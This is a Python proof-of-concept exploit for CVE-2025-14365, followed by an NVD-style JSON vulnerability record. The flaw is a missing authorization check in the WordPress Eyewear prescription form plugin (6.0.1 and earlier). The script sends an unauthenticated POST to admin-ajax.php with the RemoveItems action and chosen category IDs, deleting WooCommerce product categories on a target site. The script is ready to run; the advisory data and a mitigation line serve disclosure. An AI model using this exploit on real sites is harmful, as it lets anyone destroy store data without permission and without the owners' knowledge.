CVE-2025-14365

import requests import sys # CVE-2025-14365 PoC - Missing Authorization in Eyewear prescription form plugin # Affected: WordPress Eyewear prescription form plugin <= 6.0.1 target_url = sys.argv[1] if len(sys.argv) > 1 else "http://target-site.com" # The vulnerable AJAX endpoint ajax_endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Category IDs to delete (modify as needed) category_ids = [1, 2, 3] # Example category IDs # Construct the PoC request data = { "action": "RemoveItems", "catIds": category_ids } print(f"[*] Sending request to {ajax_endpoint}") print(f"[*] Target categories to delete: {category_ids}") try: # No authentication required (PR:N in CVSS) response = requests.post(ajax_endpoint, data=data, timeout=10) print(f"[*] Status Code: {response.status_code}") print(f"[*] Response: {response.text}") if response.status_code == 200: print("[+] Request sent successfully - categories may have been deleted") else: print("[-] Request failed") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") print("\n[*] Mitigation: Upgrade to version 6.0.2 or later") print("[*] Reference: https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L326")

{"cve": {"id": "CVE-2025-14365", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:48.467", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Eyewear prescription form plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 6.0.1. This is due to missing capability checks on the RemoveItems AJAX action. This makes it possible for unauthenticated attackers to delete arbitrary WooCommerce product categories, including all of their child categories, via the 'catIds' parameter."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L326", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/eyewear-prescription-form/tags/6.0.1/admin/class-eyewear_prescription_form-admin.php#L74", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b85fc103-20e5-4599-8ed5-5bd5d9c447ee?source=cve", "source": "[email protected]"}]}}